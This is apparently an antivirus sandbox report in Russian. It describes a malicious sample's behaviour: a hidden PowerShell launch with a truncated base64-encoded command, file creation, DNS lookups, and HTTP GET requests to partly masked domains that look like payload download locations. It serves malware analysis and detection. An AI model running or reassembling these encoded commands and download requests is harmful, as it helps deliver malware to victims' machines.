Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1178603.cvr
Сетевая активность
Подключается к
- 'pl##n.com':443
- 'hs#.pw':80
- 'me##and.com':80
TCP
Запросы HTTP GET
- http://hs#.pw/e5t9/zbqlHAhTtRZd/
- http://me##and.com/wp-content/akMmnMBbAPswO/
Другие
- 'pl##n.com':443
UDP
- DNS ASK de###usa.com
- DNS ASK pl##n.com
- DNS ASK hs#.pw
- DNS ASK me##and.com
- DNS ASK jo##tud.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...' (со скрытым окном)
